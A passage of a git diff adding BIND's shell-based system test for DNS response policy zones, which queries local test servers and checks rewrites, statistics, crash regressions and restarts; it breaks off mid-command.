+update add 128.1111.2222.3333.4444.zz.8888.rpz-ip.bl. 300 CNAME .
+update add 128.zz.3333.4444.0.0.8888.rpz-ip.bl. 300 CNAME .
+update add 128.zz.3333.4444.0.7777.8888.rpz-ip.bl. 300 CNAME .
+update add 128.zz.3333.4444.0.8777.8888.rpz-ip.bl. 300 CNAME .
+update add 127.zz.3333.4444.0.8777.8888.rpz-ip.bl. 300 CNAME .
+;
+;
+; regression testing for some old crashes
+update add redirect.bl. 300 A 127.0.0.1
+update add *.redirect.bl. 300 A 127.0.0.1
+update add *.credirect.bl. 300 CNAME google.com.
+;
+send
diff --git a/bin/tests/system/rpz/tests.sh b/bin/tests/system/rpz/tests.sh
new file mode 100644
index 0000000..738df3c
--- /dev/null
+++ b/bin/tests/system/rpz/tests.sh
@@ -0,0 +1,1012 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# test response policy zones (RPZ) + +# touch dnsrps-off to not test with DNSRPS +# touch dnsrps-only to not test with classic RPZ + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +ns=10.53.0 +ns1=$ns.1 # root, defining the others +ns2=$ns.2 # authoritative server whose records are rewritten +ns3=$ns.3 # main rewriting resolver +ns4=$ns.4 # another authoritative server that is rewritten +ns5=$ns.5 # another rewriting resolver +ns6=$ns.6 # a forwarding server +ns7=$ns.7 # another rewriting resolver +ns8=$ns.8 # another rewriting resolver +ns9=$ns.9 # another rewriting resolver +ns10=$ns.10 # authoritative server + +HAVE_CORE= + +status=0 +t=0 + +DEBUG= +SAVE_RESULTS= +ARGS= + +USAGE="$0: [-xS]" +while getopts "xS:" c; do + case $c in + x) set -x; DEBUG=-x; ARGS="$ARGS -x";; + S) SAVE_RESULTS=-S; ARGS="$ARGS -S";; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi +# really quit on control-C +trap 'exit 1' 1 2 15 + +TS='%H:%M:%S ' +TS= +comment () { + if test -n "$TS"; then + date "+${TS}$*" | cat_i + fi +} + +DNSRPSCMD=./dnsrps +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +if test -x "$DNSRPSCMD"; then + # speed up the many delays for dnsrpzd by waiting only 0.1 seconds + WAIT_CMD="$DNSRPSCMD -w 0.1" + TEN_SECS=100 +else + WAIT_CMD="sleep 1" + TEN_SECS=10 +fi + +digcmd () { + if test "$1" = TCP; then + shift + fi + # Default to +noauth and @$ns3 + # Also default to -bX where X is the @value so that OS 
X will choose + # the right IP source address. + digcmd_args=`echo "+nocookie +noadd +time=2 +tries=1 -p ${PORT} $*" | \ + sed -e "/@/!s/.*/& @$ns3/" \ + -e '/-b/!s/@\([^ ]*\)/@\1 -b\1/' \ + -e '/+n?o?auth/!s/.*/+noauth &/'` + #echo_i "dig $digcmd_args 1>&2 + $DIG $digcmd_args +} + +# set DIGNM=file name for dig output +GROUP_NM= +TEST_NUM=0 +make_dignm () { + TEST_NUM=`expr $TEST_NUM : '\([0-9]*\).*'` # trim '+' characters + TEST_NUM=`expr $TEST_NUM + 1` + DIGNM=dig.out$GROUP_NM-$TEST_NUM + while test -f $DIGNM; do + TEST_NUM="$TEST_NUM+" + DIGNM=dig.out$GROUP_NM-$TEST_NUM + done +} + +setret () { + ret=1 + status=`expr $status + 1` + echo_i "$*" +} + +# set $SN to the SOA serial number of a zone +# $1=domain +# $2=DNS server and client IP address +get_sn() { + SOA=`$DIG -p ${PORT} +short +norecurse soa "$1" "@$2" "-b$2"` + SN=`expr "$SOA" : '[^ ]* [^ ]* \([^ ]*\) .*'` + test "$SN" != "" && return + echo_i "no serial number from \`dig -p ${PORT} soa $1 @$2\` in \"$SOA\"" + exit 1 +} + +get_sn_fast () { + RSN=`$DNSRPSCMD -n "$1"` + #echo "dnsrps serial for $1 is $RSN" + if test -z "$RSN"; then + echo_i "dnsrps failed to get SOA serial number for $1" + exit 1 + fi +} + +# check that dnsrpzd has loaded its zones +# $1=domain +# $2=DNS server IP address +FZONES=`sed -n -e 's/^zone "\(.*\)".*\(10.53.0..\).*/Z=\1;M=\2/p' dnsrpzd.conf` +dnsrps_loaded() { + test "$mode" = dnsrps || return + n=0 + for V in $FZONES; do + eval "$V" + get_sn $Z $M + while true; do + get_sn_fast "$Z" + if test "$SN" -eq "0$RSN"; then + #echo "$Z @$M serial=$SN" + break + fi + n=`expr $n + 1` + if test "$n" -gt $TEN_SECS; then + echo_i "dnsrps serial for $Z is $RSN instead of $SN" + exit 1 + fi + $WAIT_CMD + done + done +} + +# check the serial number in an SOA to ensure that a policy zone has +# been (re)loaded +# $1=serial number +# $2=domain +# $3=DNS server +ck_soa() { + n=0 + while true; do + if test "$mode" = dnsrps; then + get_sn_fast "$2" + test "$RSN" -eq "$1" && return + else + get_sn 
"$2" "$3" + test "$SN" -eq "$1" && return + fi + n=`expr $n + 1` + if test "$n" -gt $TEN_SECS; then + echo_i "got serial number \"$SN\" instead of \"$1\" from $2 @$3" + return + fi + $WAIT_CMD + done +} + +# (re)load the response policy zones with the rules in the file $TEST_FILE +load_db () { + if test -n "$TEST_FILE"; then + copy_setports $TEST_FILE tmp + if $NSUPDATE -v tmp; then : + $RNDCCMD $ns3 sync + else + echo_i "failed to update policy zone with $TEST_FILE" + $RNDCCMD $ns3 sync + exit 1 + fi + rm -f tmp + fi +} + +# restart name server +# $1 ns number +# $2 rebuild bl rpz zones if "rebuild-bl-rpz" +restart () { + # try to ensure that the server really has stopped + # and won't mess with ns$1/name.pid + if test -z "$HAVE_CORE" -a -f ns$1/named.pid; then + $RNDCCMD $ns$1 halt >/dev/null 2>&1 + if test -f ns$1/named.pid; then + sleep 1 + PID=`cat ns$1/named.pid 2>/dev/null` + if test -n "$PID"; then + echo_i "killing ns$1 server $PID" + $KILL -9 $PID + fi + fi + fi + rm -f ns$1/*.jnl + if [ "$2" = "rebuild-bl-rpz" ]; then + if test -f ns$1/base.db; then + for NM in ns$1/bl*.db; do + cp -f ns$1/base.db $NM + done + fi + fi + start_server --noclean --restart --port ${PORT} ns$1 + load_db + dnsrps_loaded + sleep 1 +} + +# $1=server and irrelevant args +# $2=error message +ckalive () { + CKALIVE_NS=`expr "$1" : '.*@ns\([1-9]\).*'` + if test -z "$CKALIVE_NS"; then + CKALIVE_NS=3 + fi + eval CKALIVE_IP=\$ns$CKALIVE_NS + $RNDCCMD $CKALIVE_IP status >/dev/null 2>&1 && return 0 + HAVE_CORE=yes + setret "$2" + # restart the server to avoid stalling waiting for it to stop + restart $CKALIVE_NS "rebuild-bl-rpz" + return 1 +} + +resetstats () { + NSDIR=$1 + eval "${NSDIR}_CNT=''" +} + +ckstats () { + HOST=$1 + LABEL="$2" + NSDIR="$3" + EXPECTED="$4" + $RNDCCMD $HOST stats + NEW_CNT=0`sed -n -e 's/[ ]*\([0-9]*\).response policy.*/\1/p' \ + $NSDIR/named.stats | tail -1` + eval "OLD_CNT=0\$${NSDIR}_CNT" + GOT=`expr $NEW_CNT - $OLD_CNT` + if test "$GOT" -ne "$EXPECTED"; then 
+ setret "wrong $LABEL $NSDIR statistics of $GOT instead of $EXPECTED" + fi + eval "${NSDIR}_CNT=$NEW_CNT" +} + +ckstatsrange () { + HOST=$1 + LABEL="$2" + NSDIR="$3" + MIN="$4" + MAX="$5" + $RNDCCMD $HOST stats + NEW_CNT=0`sed -n -e 's/[ ]*\([0-9]*\).response policy.*/\1/p' \ + $NSDIR/named.stats | tail -1` + eval "OLD_CNT=0\$${NSDIR}_CNT" + GOT=`expr $NEW_CNT - $OLD_CNT` + if test "$GOT" -lt "$MIN" -o "$GOT" -gt "$MAX"; then + setret "wrong $LABEL $NSDIR statistics of $GOT instead of ${MIN}..${MAX}" + fi + eval "${NSDIR}_CNT=$NEW_CNT" +} + +# $1=message +# $2=optional test file name +start_group () { + ret=0 + t=`expr $t + 1` + test -n "$1" && date "+${TS}checking $1 (${t})" | cat_i + TEST_FILE=$2 + if test -n "$TEST_FILE"; then + GROUP_NM="-$TEST_FILE" + load_db + else + GROUP_NM= + fi + dnsrps_loaded + TEST_NUM=0 +} + +end_group () { + if test -n "$TEST_FILE"; then + # remove the previous set of test rules + copy_setports $TEST_FILE tmp + sed -e 's/[ ]add[ ]/ delete /' tmp | $NSUPDATE + rm -f tmp + TEST_FILE= + fi + ckalive $ns3 "failed; ns3 server crashed and restarted" + dnsrps_loaded + GROUP_NM= +} + +clean_result () { + if test -z "$SAVE_RESULTS"; then + rm -f $* + fi +} + +# $1=dig args +# $2=other dig output file +ckresult () { + #ckalive "$1" "server crashed by 'dig $1'" || return 1 + expr "$1" : 'TCP ' > /dev/null && tcp=1 || tcp=0 + digarg=${1#TCP } + + if grep "flags:.* aa .*ad;" $DIGNM; then + setret "'dig $digarg' AA and AD set;" + elif grep "flags:.* aa .*ad;" $DIGNM; then + setret "'dig $digarg' AD set;" + fi + + if $PERL $SYSTEMTESTTOP/digcomp.pl $DIGNM $2 >/dev/null; then + grep -q 'Truncated, retrying in TCP' $DIGNM && trunc=1 || trunc=0 + if [ "$tcp" -ne "$trunc" ]; then + setret "'dig $digarg' wrong; no or unexpected truncation in $DIGNM" + return 1 + fi + clean_result ${DIGNM}* + return 0 + fi + setret "'dig $digarg' wrong; diff $DIGNM $2" + return 1 +} + +# check only that the server does not crash +# $1=target domain +# $2=optional query 
type +nocrash () { + digcmd $* >/dev/null + ckalive "$*" "server crashed by 'dig $*'" +} + + +# check rewrite to NXDOMAIN +# $1=target domain +# $2=optional query type +nxdomain () { + make_dignm + digcmd $* \ + | sed -e 's/^[a-z].* IN CNAME /;xxx &/' \ + -e 's/^[a-z].* IN RRSIG /;xxx &/' \ + >$DIGNM + ckresult "$*" proto.nxdomain +} + +# check rewrite to NODATA +# $1=target domain +# $2=optional query type +nodata () { + make_dignm + digcmd $* \ + | sed -e 's/^[a-z].* IN CNAME /;xxx &/' >$DIGNM + ckresult "$*" proto.nodata +} + +# check rewrite to an address +# modify the output so that it is easily compared, but save the original line +# $1=IPv4 address +# $2=digcmd args +# $3=optional TTL +addr () { + ADDR=$1 + make_dignm + digcmd $2 >$DIGNM + #ckalive "$2" "server crashed by 'dig $2'" || return 1 + ADDR_ESC=`echo "$ADDR" | sed -e 's/\./\\\\./g'` + ADDR_TTL=`tr -d '\r' < $DIGNM | sed -n -e "s/^[-.a-z0-9]\{1,\}[ ]*\([0-9]*\) IN AA* ${ADDR_ESC}\$/\1/p"` + if test -z "$ADDR_TTL"; then + setret "'dig $2' wrong; no address $ADDR record in $DIGNM" + return 1 + fi + if test -n "$3" && test "$ADDR_TTL" -ne "$3"; then + setret "'dig $2' wrong; TTL=$ADDR_TTL instead of $3 in $DIGNM" + return 1 + fi + clean_result ${DIGNM}* +} + +# Check that a response is not rewritten +# Use $ns1 instead of the authority for most test domains, $ns2 to prevent +# spurious differences for `dig +norecurse` +# $1=optional "TCP" +# remaining args for dig +nochange () { + make_dignm + digcmd $* >$DIGNM + digcmd $* @$ns1 >${DIGNM}_OK + ckresult "$*" ${DIGNM}_OK && clean_result ${DIGNM}_OK +} + +nochange_ns10 () { + make_dignm + digcmd $* >$DIGNM + digcmd $* @$ns10 >${DIGNM}_OK + ckresult "$*" ${DIGNM}_OK && clean_result ${DIGNM}_OK +} + +# check against a 'here document' +here () { + make_dignm + sed -e 's/^[ ]*//' >${DIGNM}_OK + digcmd $* >$DIGNM + ckresult "$*" ${DIGNM}_OK +} + +# check dropped response +DROPPED='^;; connection timed out; no servers could be reached' +drop () { + make_dignm + 
digcmd $* >$DIGNM + if grep "$DROPPED" $DIGNM >/dev/null; then + clean_result ${DIGNM}* + return 0 + fi + setret "'dig $1' wrong; response in $DIGNM" + return 1 +} + +nsd() { + $NSUPDATE -p ${PORT} << EOF + server $1 + ttl 300 + update $2 $3 IN CNAME . + update $2 $4 IN CNAME . + send +EOF + sleep 2 +} + +# +# generate prototype NXDOMAIN response to compare against. +# +make_proto_nxdomain() { + digcmd nonexistent @$ns2 >proto.nxdomain || return 1 + grep "status: NXDOMAIN" proto.nxdomain >/dev/null || return 1 + return 0 +} + +# +# generate prototype NODATA response to compare against. +# +make_proto_nodata() { + digcmd txt-only.tld2 @$ns2 >proto.nodata || return 1 + grep "status: NOERROR" proto.nodata >/dev/null || return 1 + return 0 +} + +for mode in native dnsrps; do + status=0 + case ${mode} in + native) + if [ -e dnsrps-only ] ; then + echo_i "'dnsrps-only' found: skipping native RPZ sub-test" + continue + else + echo_i "running native RPZ sub-test" + fi + ;; + dnsrps) + if [ -e dnsrps-off ] ; then + echo_i "'dnsrps-off' found: skipping DNSRPS sub-test" + continue + fi + echo_i "attempting to configure servers with DNSRPS..." + stop_server --use-rndc --port ${CONTROLPORT} + $SHELL ./setup.sh -N -D $DEBUG + for server in ns*; do + resetstats $server + done + sed -n 's/^## //p' dnsrps.conf | cat_i + if grep '^#fail' dnsrps.conf >/dev/null; then + echo_i "exit status: 1" + exit 1 + fi + if grep '^#skip' dnsrps.conf > /dev/null; then + echo_i "DNSRPS sub-test skipped" + continue + else + echo_i "running DNSRPS sub-test" + start_server --noclean --restart --port ${PORT} + sleep 3 + fi + ;; + esac + + # make prototype files to check against rewritten results + retry_quiet 10 make_proto_nxdomain + retry_quiet 10 make_proto_nodata + + start_group "QNAME rewrites" test1 + nochange . 
# 1 do not crash or rewrite root + nxdomain a0-1.tld2 # 2 + nodata a3-1.tld2 # 3 + nodata a3-2.tld2 # 4 nodata at DNAME itself + nochange sub.a3-2.tld2 # 5 miss where DNAME might work + nxdomain a4-2.tld2 # 6 rewrite based on CNAME target + nxdomain a4-2-cname.tld2 # 7 + nodata a4-3-cname.tld2 # 8 + addr 12.12.12.12 a4-1.sub1.tld2 # 9 A replacement + addr 12.12.12.12 a4-1.sub2.tld2 # 10 A replacement with wildcard + addr 12.12.12.12 nxc1.sub1.tld2 # 11 replace NXDOMAIN with CNAME + addr 12.12.12.12 nxc2.sub1.tld2 # 12 replace NXDOMAIN with CNAME chain + addr 127.4.4.1 a4-4.tld2 # 13 prefer 1st conflicting QNAME zone + nochange a6-1.tld2 # 14 + addr 127.6.2.1 a6-2.tld2 # 15 + addr 56.56.56.56 a3-6.tld2 # 16 wildcard CNAME + addr 57.57.57.57 a3-7.sub1.tld2 # 17 wildcard CNAME + addr 127.0.0.16 a4-5-cname3.tld2 # 18 CNAME chain + addr 127.0.0.17 a4-6-cname3.tld2 # 19 stop short in CNAME chain + nochange a5-2.tld2 +norecurse # 20 check that RD=1 is required + nochange a5-3.tld2 +norecurse # 21 + nochange a5-4.tld2 +norecurse # 22 + nochange sub.a5-4.tld2 +norecurse # 23 + nxdomain c1.crash2.tld3 # 24 assert in rbtdb.c + nxdomain a0-1.tld2 +dnssec # 25 simple DO=1 without signatures + nxdomain a0-1.tld2s +nodnssec # 26 simple DO=0 with signatures + nochange a0-1.tld2s +dnssec # 27 simple DO=1 with signatures + nxdomain a0-1s-cname.tld2s +dnssec # 28 DNSSEC too early in CNAME chain + nochange a0-1-scname.tld2 +dnssec # 29 DNSSEC on target in CNAME chain + nochange a0-1.tld2s srv +auth +dnssec # 30 no write for DNSSEC and no record + nxdomain a0-1.tld2s srv +nodnssec # 31 + drop a3-8.tld2 any # 32 drop + nochange TCP a3-9.tld2 # 33 tcp-only + here x.servfail <<'EOF' # 34 qname-wait-recurse yes + ;; status: SERVFAIL, x +EOF + addr 35.35.35.35 "x.servfail @$ns5" # 35 qname-wait-recurse no + end_group + ckstats $ns3 test1 ns3 22 + ckstats $ns5 test1 ns5 1 + ckstats $ns6 test1 ns6 0 + + start_group "NXDOMAIN/NODATA action on QNAME trigger" test1 + nxdomain a0-1.tld2 @$ns6 # 1 
+ nodata a3-1.tld2 @$ns6 # 2 + nodata a3-2.tld2 @$ns6 # 3 nodata at DNAME itself + nxdomain a4-2.tld2 @$ns6 # 4 rewrite based on CNAME target + nxdomain a4-2-cname.tld2 @$ns6 # 5 + nodata a4-3-cname.tld2 @$ns6 # 6 + addr 12.12.12.12 "a4-1.sub1.tld2 @$ns6" # 7 A replacement + addr 12.12.12.12 "a4-1.sub2.tld2 @$ns6" # 8 A replacement with wildcard + addr 127.4.4.1 "a4-4.tld2 @$ns6" # 9 prefer 1st conflicting QNAME zone + addr 12.12.12.12 "nxc1.sub1.tld2 @$ns6" # 10 replace NXDOMAIN w/ CNAME + addr 12.12.12.12 "nxc2.sub1.tld2 @$ns6" # 11 replace NXDOMAIN w/ CNAME chain + addr 127.6.2.1 "a6-2.tld2 @$ns6" # 12 + addr 56.56.56.56 "a3-6.tld2 @$ns6" # 13 wildcard CNAME + addr 57.57.57.57 "a3-7.sub1.tld2 @$ns6" # 14 wildcard CNAME + addr 127.0.0.16 "a4-5-cname3.tld2 @$ns6" # 15 CNAME chain + addr 127.0.0.17 "a4-6-cname3.tld2 @$ns6" # 16 stop short in CNAME chain + nxdomain c1.crash2.tld3 @$ns6 # 17 assert in rbtdb.c + nxdomain a0-1.tld2 +dnssec @$ns6 # 18 simple DO=1 without sigs + nxdomain a0-1s-cname.tld2s +dnssec @$ns6 # 19 + drop a3-8.tld2 any @$ns6 # 20 drop + end_group + ckstatsrange $ns3 test1 ns3 22 30 + ckstats $ns5 test1 ns5 0 + ckstats $ns6 test1 ns6 0 + + start_group "IP rewrites" test2 + nodata a3-1.tld2 # 1 NODATA + nochange a3-2.tld2 # 2 no policy record so no change + nochange a4-1.tld2 # 3 obsolete PASSTHRU record style + nxdomain a4-2.tld2 # 4 + nochange a4-2.tld2 -taaaa # 5 no A => no policy rewrite + nochange a4-2.tld2 -ttxt # 6 no A => no policy rewrite + nxdomain a4-2.tld2 -tany # 7 no A => no policy rewrite + nodata a4-3.tld2 # 8 + nxdomain a3-1.tld2 -taaaa # 9 IPv6 policy + nochange a4-1-aaaa.tld2 -taaaa # 10 + addr 127.0.0.1 a5-1-2.tld2 # 11 prefer smallest policy address + addr 127.0.0.1 a5-3.tld2 # 12 prefer first conflicting IP zone + nochange a5-4.tld2 +norecurse # 13 check that RD=1 is required for #14 + addr 14.14.14.14 a5-4.tld2 # 14 prefer QNAME to IP + nochange a4-4.tld2 # 15 PASSTHRU + nxdomain c2.crash2.tld3 # 16 assert in rbtdb.c + addr 
127.0.0.17 "a4-4.tld2 -b $ns1" # 17 client-IP address trigger + nxdomain a7-1.tld2 # 18 secondary policy zone (RT34450) + # updating an response zone policy + cp ns2/blv2.tld2.db.in ns2/bl.tld2.db + rndc_reload ns2 $ns2 bl.tld2 + ck_soa 2 bl.tld2 $ns3 + nochange a7-1.tld2 # 19 PASSTHRU + # ensure that a clock tick has occurred so that named will do the reload + sleep 1 + cp ns2/blv3.tld2.db.in ns2/bl.tld2.db + rndc_reload ns2 $ns2 bl.tld2 + ck_soa 3 bl.tld2 $ns3 + nxdomain a7-1.tld2 # 20 secondary policy zone (RT34450) + end_group + ckstats $ns3 test2 ns3 12 + + # check that IP addresses for previous group were deleted from the radix tree + start_group "radix tree deletions" + nochange a3-1.tld2 + nochange a3-2.tld2 + nochange a4-1.tld2 + nochange a4-2.tld2 + nochange a4-2.tld2 -taaaa + nochange a4-2.tld2 -ttxt + nochange a4-2.tld2 -tany + nochange a4-3.tld2 + nochange a3-1.tld2 -tAAAA + nochange a4-1-aaaa.tld2 -tAAAA + nochange a5-1-2.tld2 + end_group + ckstats $ns3 'radix tree deletions' ns3 0 + + # these tests assume "min-ns-dots 0" + start_group "NSDNAME rewrites" test3 + nextpart ns3/named.run > /dev/null + nochange a3-1.tld2 # 1 + nochange a3-1.tld2 +dnssec # 2 this once caused problems + nxdomain a3-1.sub1.tld2 # 3 NXDOMAIN *.sub1.tld2 by NSDNAME + nxdomain a3-1.subsub.sub1.tld2 # 4 + nxdomain a3-1.subsub.sub1.tld2 -tany # 5 + addr 12.12.12.12 a4-2.subsub.sub2.tld2 # 6 walled garden for *.sub2.tld2 + nochange a3-2.tld2. # 7 exempt rewrite by name + nochange a0-1.tld2. # 8 exempt rewrite by address block + addr 12.12.12.12 a4-1.tld2 # 9 prefer QNAME policy to NSDNAME + addr 127.0.0.1 a3-1.sub3.tld2 # 10 prefer policy for largest NSDNAME + addr 127.0.0.2 a3-1.subsub.sub3.tld2 # 11 + nxdomain xxx.crash1.tld2 # 12 dns_db_detachnode() crash + + nxdomain a3-1.stub # 13 + nxdomain a3-1.static-stub # 14 + nochange_ns10 a3-1.stub-nomatch # 15 + nochange_ns10 a3-1.static-stub-nomatch # 16 + if [ "$mode" = dnsrps ]; then + addr 12.12.12.12 as-ns.tld5. 
# 17 qname-as-ns + fi + nextpart ns3/named.run | grep -q "unrecognized NS rpz_rrset_find() failed: glue" && + setret "seen: unrecognized NS rpz_rrset_find() failed: glue" + end_group + if [ "$mode" = dnsrps ]; then + ckstats $ns3 test3 ns3 10 + else + ckstats $ns3 test3 ns3 9 + fi + + # these tests assume "min-ns-dots 0" + start_group "NSIP rewrites" test4 + nextpart ns3/named.run > /dev/null + nxdomain a3-1.tld2 # 1 NXDOMAIN for all of tld2 + nochange a3-2.tld2. # 2 exempt rewrite by name + nochange a0-1.tld2. # 3 exempt rewrite by address block + nochange a3-1.tld4 # 4 different NS IP address + nxdomain a4-1.stub # 5 + nxdomain a4-1.static-stub # 6 + nochange_ns10 a4-1.stub-nomatch # 7 + nochange_ns10 a4-1.static-stub-nomatch # 8 + if [ "$mode" = dnsrps ]; then + addr 12.12.12.12 as-ns.tld5. # 9 ip-as-ns + fi + nextpart ns3/named.run | grep -q "unrecognized NS rpz_rrset_find() failed: glue" && + setret "seen: unrecognized NS rpz_rrset_find() failed: glue" + end_group + + start_group "walled garden NSIP rewrites" test4a + addr 41.41.41.41 a3-1.tld2 # 1 walled garden for all of tld2 + addr 2041::41 'a3-1.tld2 AAAA' # 2 walled garden for all of tld2 + here a3-1.tld2 TXT <<'EOF' # 3 text message for all of tld2 + ;; status: NOERROR, x + a3-1.tld2. 
x IN TXT "NSIP walled garden" +EOF + end_group + if [ "$mode" = dnsrps ]; then + ckstats $ns3 test4 ns3 7 + else + ckstats $ns3 test4 ns3 6 + fi + + # policies in ./test5 overridden by response-policy{} in ns3/named.conf + # and in ns5/named.conf + start_group "policy overrides" test5 + addr 127.0.0.1 a3-1.tld2 # 1 bl-given + nochange a3-2.tld2 # 2 bl-passthru + nochange a3-3.tld2 # 3 bl-no-op (obsolete for passthru) + nochange a3-4.tld2 # 4 bl-disabled + nodata a3-5.tld2 # 5 bl-nodata zone recursive-only no + nodata a3-5.tld2 +norecurse # 6 bl-nodata zone recursive-only no + nodata a3-5.tld2 # 7 bl-nodata not needed + nxdomain a3-5.tld2 +norecurse @$ns5 # 8 bl-nodata global recursive-only no + nxdomain a3-5.tld2s @$ns5 # 9 bl-nodata global break-dnssec + nxdomain a3-5.tld2s +dnssec @$ns5 # 10 bl-nodata global break-dnssec + nxdomain a3-6.tld2 # 11 bl-nxdomain + here a3-7.tld2 -tany <<'EOF' # 12 + ;; status: NOERROR, x + a3-7.tld2. x IN CNAME txt-only.tld2. + txt-only.tld2. x IN TXT "txt-only-tld2" +EOF + addr 58.58.58.58 a3-8.tld2 # 13 bl_wildcname + addr 59.59.59.59 a3-9.sub9.tld2 # 14 bl_wildcname + addr 12.12.12.12 a3-15.tld2 # 15 bl-garden via CNAME to a12.tld2 + addr 127.0.0.16 a3-16.tld2 100 # 16 bl max-policy-ttl 100 + addr 17.17.17.17 "a3-17.tld2 @$ns5" 90 # 17 ns5 bl max-policy-ttl 90 + drop a3-18.tld2 any # 18 bl-drop + nxdomain TCP a3-19.tld2 # 19 bl-tcp-only + end_group + ckstats $ns3 test5 ns3 12 + ckstats $ns5 test5 ns5 4 + + # check that miscellaneous bugs are still absent + start_group "crashes" test6 + for Q in RRSIG SIG ANY 'ANY +dnssec'; do + nocrash a3-1.tld2 -t$Q + nocrash a3-2.tld2 -t$Q + nocrash a3-5.tld2 -t$Q + nocrash www.redirect -t$Q + nocrash www.credirect -t$Q + done + + # This is not a bug, because any data leaked by writing 24.4.3.2.10.rpz-ip + # (or whatever) is available by publishing "foo A 10.2.3.4" and then + # resolving foo. 
+ # nxdomain 32.3.2.1.127.rpz-ip + end_group + ckstats $ns3 bugs ns3 8 + + # superficial test for major performance bugs + QPERF=`sh qperf.sh` + if test -n "$QPERF"; then + perf () { + date "+${TS}checking performance $1" | cat_i + # Dry run to prime everything + comment "before dry run $1" + $RNDCCMD $ns5 notrace + $QPERF -c -1 -l30 -d ns5/requests -s $ns5 -p ${PORT} >/dev/null + comment "before real test $1" + PFILE="ns5/$2.perf" + $QPERF -c -1 -l30 -d ns5/requests -s $ns5 -p ${PORT} >$PFILE + comment "after test $1" + X=`sed -n -e 's/.*Returned *\([^ ]*:\) *\([0-9]*\) .*/\1\2/p' $PFILE \ + | tr '\n' ' '` + if test "$X" != "$3"; then + setret "wrong results '$X' in $PFILE" + fi + ckalive $ns5 "failed; server #5 crashed" + } + trim () { + sed -n -e 's/.*Queries per second: *\([0-9]*\).*/\1/p' ns5/$1.perf + } + + # get qps with rpz + perf 'with RPZ' rpz 'NOERROR:2900 NXDOMAIN:100 ' + RPZ=`trim rpz` + # turn off rpz and measure qps again + echo "# RPZ off" >ns5/rpz-switch + RNDCCMD_OUT=`$RNDCCMD $ns5 reload` + perf 'without RPZ' norpz 'NOERROR:3000 ' + NORPZ=`trim norpz` + + PERCENT=`expr \( "$RPZ" \* 100 + \( $NORPZ / 2 \) \) / $NORPZ` + echo_i "$RPZ qps with RPZ is $PERCENT% of $NORPZ qps without RPZ" + + MIN_PERCENT=30 + if test "$PERCENT" -lt $MIN_PERCENT; then + echo_i "$RPZ qps with rpz or $PERCENT% is below $MIN_PERCENT% of $NORPZ qps" + fi + + if test "$PERCENT" -ge 100; then + echo_i "$RPZ qps with RPZ or $PERCENT% of $NORPZ qps without RPZ is too high" + fi + + ckstats $ns5 performance ns5 200 + + else + echo_i "performance not checked; queryperf not available" + fi + + if [ "$mode" = dnsrps ]; then + echo_i "checking that dnsrpzd is automatically restarted" + OLD_PID=`cat dnsrpzd.pid` + $KILL "$OLD_PID" + n=0 + while true; do + NEW_PID=`cat dnsrpzd.pid 2>/dev/null` + if test -n "$NEW_PID" -a "0$OLD_PID" -ne "0$NEW_PID"; then + #echo "OLD_PID=$OLD_PID NEW_PID=$NEW_PID" + break; + fi + $DIG -p ${PORT} +short +norecurse a0-1.tld2 @$ns3 >/dev/null + n=`expr 
$n + 1` + if test "$n" -gt $TEN_SECS; then + setret "dnsrpzd did not restart" + break + fi + $WAIT_CMD + done + fi + + # Ensure ns3 manages to transfer the fast-expire zone before shutdown. + nextpartreset ns3/named.run + wait_for_log 20 "zone fast-expire/IN: transferred serial 1" ns3/named.run + + # reconfigure the ns5 primary server without the fast-expire zone, so + # it can't be refreshed on ns3, and will expire in 5 seconds. + cat /dev/null > ns5/expire.conf + rndc_reconfig ns5 10.53.0.5 + + # restart the main test RPZ server to see if that creates a core file + if test -z "$HAVE_CORE"; then + stop_server --use-rndc --port ${CONTROLPORT} ns3 + restart 3 "rebuild-bl-rpz" + HAVE_CORE=`find ns* -name '*core*' -print` + test -z "$HAVE_CORE" || setret "found $HAVE_CORE; memory leak?" + fi + + # look for complaints from lib/dns/rpz.c and bin/name/query.c + for runfile in ns*/named.run; do + EMSGS=`nextpart $runfile | grep -E -l 'invalid rpz|rpz.*failed'` + if test -n "$EMSGS"; then + setret "error messages in $runfile starting with:" + grep -E 'invalid rpz|rpz.*failed' ns*/named.run | \ + sed -e '10,$d' -e 's/^//' | cat_i + fi + done + + if [ native = "$mode" ]; then + # restart the main test RPZ server with a bad zone. 
+ t=`expr $t + 1` + echo_i "checking that ns3 with broken rpz does not crash (${t})" + stop_server --use-rndc --port ${CONTROLPORT} ns3 + cp ns3/broken.db.in ns3/bl.db + restart 3 # do not rebuild rpz zones + nocrash a3-1.tld2 -tA + stop_server --use-rndc --port ${CONTROLPORT} ns3 + restart 3 "rebuild-bl-rpz" + + t=`expr $t + 1` + echo_i "checking if rpz survives a certain class of failed reconfiguration attempts (${t})" + sed -e "s/^#BAD//" < ns3/named.conf.in > ns3/named.conf.tmp + copy_setports ns3/named.conf.tmp ns3/named.conf + rm ns3/named.conf.tmp + $RNDCCMD $ns3 reconfig > /dev/null 2>&1 && setret "failed" + sleep 1 + copy_setports ns3/named.conf.in ns3/named.conf + $RNDCCMD $ns3 reconfig || setret "failed" + + # reload a RPZ zone that is now deliberately broken. + t=`expr $t + 1` + echo_i "checking rpz failed update will keep previous rpz rules (${t})" + $DIG -p ${PORT} @$ns3 walled.tld2 > dig.out.$t.before + grep "walled\.tld2\..*IN.*A.*10\.0\.0\.1" dig.out.$t.before > /dev/null || setret "failed" + cp ns3/broken.db.in ns3/manual-update-rpz.db + rndc_reload ns3 $ns3 manual-update-rpz + sleep 1 + # ensure previous RPZ rules still apply. + $DIG -p ${PORT} @$ns3 walled.tld2 > dig.out.$t.after + grep "walled\.tld2\..*IN.*A.*10\.0\.0\.1" dig.out.$t.after > /dev/null || setret "failed" + + t=`expr $t + 1` + echo_i "checking reload of a mixed-case RPZ zone (${t})" + # First, a sanity check: the A6-2.TLD2.mixed-case-rpz RPZ record should + # cause a6-2.tld2 NOERROR answers to be rewritten to NXDOMAIN answers. + $DIG -p ${PORT} @$ns3 a6-2.tld2. A > 